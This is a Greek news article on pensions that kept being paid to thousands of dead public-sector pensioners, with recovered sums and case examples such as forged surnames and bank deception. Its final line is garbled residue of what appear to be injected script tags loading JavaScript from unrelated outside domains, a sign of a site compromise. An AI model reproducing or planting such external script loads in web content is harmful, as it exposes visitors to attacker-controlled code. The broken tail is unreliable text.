Πώς γινόταν το κόλπο με τις μαϊμού συντάξεις!

o-bouleutis-o-dikastis-kai-oi-maimou-suntakseis

Πώς έστηναν επί δεκαετίες συντάξεις-μαϊμού και έπαιρναν εκατοντάδες χιλιάδες ευρώ, με το δημόσιο να πληρώνει πεθαμένους. Χαρακτηριστικά παραδείγματα.

Μαϊμού και πεθαμένοι συνταξιούχοι του δημοσίου – τέλος. Τουλάχιστον αυτό προσπαθεί να πετύχει το Γενικό Λογιστήριο του Κράτους, το οποίο μετά την ολοκλήρωση της απογραφής των συνταξιούχων, ανακοίνωσε πως έχουν ανακτηθεί 42 εκατ. ευρώ αχρεωστήτως καταβληθέντων συντάξεων και αναζητούνται ακόμα 22,2 εκατ. ευρώ.

Ο αναπληρωτής υπουργός Οικονομικών Χρήστος Σταϊκούρας μέσα από τα στοιχεία της απογραφής, αποκάλυψε την μεγάλη… φαντασία και εφευρετικότητα που έχουν οι Ελληνες οι οποίοι με τον ένα ή τον άλλο τρόπο, κατάφερναν να παίρνουν επί δεκαετίες και μετά τον θάνατο συγγενούς τους, συντάξεις.

Συγκεκριμένα, η απογραφή αποκάλυψε πως συντάξεις ύψους 64,4 εκατ. ευρώ καταβάλλονταν σε 3.423 συνταξιούχους του δημοσίου, μετά θάνατον.

Πρόκειται, όπως τόνισε ο κ. Σταϊκούρας, για την πρώτη επί της ουσίας καθολική απογραφή συνταξιούχων του Δημοσίου μετά το 1949 οπότε και διενεργήθηκε η τελευταία.

Όπως ανακοινώθηκε από το έλεγχο των περιπτώσεων των θανόντων συνταξιούχων, διαπιστώθηκαν 358 περιπτώσεις, με αχρεωστήτως καταβληθέντα ποσά άνω των 30.000 ευρώ. Οι περιπτώσεις αυτές έχουν ήδη αποσταλεί στις αρμόδιες εισαγγελικές και αστυνομικές Αρχές.

Για αυτές τις 358 περιπτώσεις αναζητήθηκε στους τραπεζικούς λογαριασμούς που πιστώνονταν οι συντάξεις το αχρεωστήτως καταβληθέν ποσό των 26,6 εκατ. ευρώ.

Από την ολοκλήρωση της απογραφής διαπιστώθηκαν 3.423 θάνατοι συνταξιούχων για τους οποίους συνέχισε να καταβάλλεται κανονικά σύνταξη.

Χαρακτηριστικές περιπτώσεις

  • Χαρακτηριστική είναι η περίπτωση καταβολής σύνταξης στην Καρδίτσα για το διάστημα από το 2000 έως τον Ιούλιο του 2012 ύψους 167.189 ευρώ. Ο πραγματικά δικαιούχος συνταξιούχος είχε πεθάνει από τον Σεπτέμβριο του 2000.
  • Κόρη δικαστικού, που πέθανε πριν πέντε χρόνια με τη μηναία σύνταξη να φτάνει τα 4.000 ευρώ, ελάμβανε κανονικότατα τη σύνταξη με το ποσό που κατατέθηκε στο λογαριασμό μετά το θάνατο να φτάνει τις 300.000 ευρώ. Η κόρη είχε παραποιήσει το επώνυμο (αλλαγή συμφώνου) προκειμένου να καταγράφεται ο θάνατος. Μάλιστα η κόρη είχε πάρει στεγαστικό δάνειο το οποίο αποπληρωνόταν απευθείας από το λογαριασμό που έμπαινε η σύνταξη.
  • Συνταξιούχος ιερέας ο οποίος πέθανε το 1999 και από τότε οι συντάξεις συνέχισαν να καταβάλλονται στο λογαριασμό του. Από τα 147.000 ευρώ που είχαν καταβληθεί και το ΓΛΚ προσπάθησε να ανακτήσει στο λογαριασμό του ιερέα όπου συνδικαιούχος ήταν ο γιος του βρέθηκαν μόλις… 11 ευρώ.
  • Σε συνταξιούχο του Δημοσίου ο οποίος είχε πεθάνει από το 1991, η κόρη του εισέπραττε από το 1991 έως το 1998 τη σύνταξη μέσω ΕΛΤΑ. Από το 1998, εξαπατώντας την τράπεζα (παρουσίαση τρίτου προσώπου ως του δικαιούχου συνταξιούχου), άνοιξε λογαριασμό με συνδικαιούχο την ίδια.
  • Δικαιούχος πολιτικής σύνταξης,που είχε διατελέσει βουλευτής ο οποίος πέθανε το 1988, εμφανιζόταν να κάνει φορολογική δήλωση έως το 2010.
  • Χήρα από 1969 η οποία παντρεύτηκε ξανά το 1972, δεν δήλωσε τον γάμο της για να μην χάσει τη σύνταξη.
  • Δικαιούχος στρατιωτικής σύνταξης, στη ληξιαρχική πράξη θανάτου του οποίου αναφέρεται ως αιτία θανάτου ο στραγγαλισμός μετά από εγκληματική ενέργεια, αλλά στον τραπεζικό του λογαριασμό όπου έμπαινε βρέθηκαν μόνο 5 ευρώ.
  • Από τους ελέγχους που διεξήγαγε το ΓΛΚ ανακαλύφθηκε ότι τρεις υπάλληλοι του εμπλέκονταν σε κύκλωμα στο οποίο «ζωντάνευαν» πεθαμένους συνταξιούχους και στη συνέχεια διοχέτευαν τα χρήματα σε δικούς τους λογαριασμούς.

___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >